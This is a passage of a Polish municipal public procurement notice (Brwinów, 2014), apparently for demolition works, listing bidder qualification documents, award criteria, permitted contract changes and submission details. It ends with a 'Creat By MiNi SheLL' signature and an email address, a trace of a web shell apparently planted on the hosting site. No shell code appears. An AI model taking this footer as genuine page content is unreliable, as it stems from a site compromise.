2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 4 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz  z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
UWAGA! Treść zobowiązania podmiotu trzeciego  powinna określać : 
a) kto jest podmiotem udostępniającym i przyjmującym zasoby, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,
d) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem.
W sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym (wiedza i doświadczenie), niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonaniu zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do formy uczestnictwa tego podmiotu w wykonaniu zamówienia (np. podwykonawstwo, doradztwo, nadzór lub inne). 
Uwaga: Zamawiający rozróżnia uczestnictwo podmiotu od jego udziału w realizacji części zamówienia, z czym wiąże się zakres wymaganych dokumentów od podmiotu trzeciego, zgodnie z treścią przepisów rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, którego zapisy wyraźnie odróżniają sytuację polegania na zasobach innych podmiotów (par. 1 ust. 6) od polegania na zasobach innych podmiotów, jeżeli podmioty te będą brały udział w realizacji części zamówienia (par. 3 ust.4). 

2) Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmianę postanowień niniejszej umowy zgodnie z wymogami art. 144 ustawy z dnia 29 stycznia 2004r Prawo Zamówień Publicznych (Dz. U. z 2013 poz. 907 ze zm.), w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1, Wykonawca jest obowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego, 
3)	zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych przez Wykonawców według postanowień § 8 umowy,
4)	wystąpienie siły wyższej określonej w umowie, 
5)	przyspieszenie ukończenia lub usprawnienie przebiegu robót rozbiórkowych,
6)	zmianę terminu realizacji umowy z powodu wystąpienia nadzwyczajnych warunków atmosferycznych w szczególności klęsk żywiołowych, uniemożliwiających prowadzenie budowlanych robót rozbiórkowych, 
7)	nadzwyczajnych warunków nieprzewidzianych w SIWZ jak: niewypały i niewybuchy; wykopaliska archeologiczne; inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujących niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową,
8)	zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia,
9)	zmiany uzasadnione okolicznościami o których mowa w art. 357 (1)Kodeksu Cywilnego,
10)	w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki zewnętrzne (np. inne niezależne budowy),
11)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, mimo zachowania należytej staranności przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW, 05-840 BRWINÓW UL. KOŚCIUSZKI 4A, pokój nr 22- Zespół ds. zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, UL. GRODZISKA 12, Biuro Obsługi Interesanta - pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com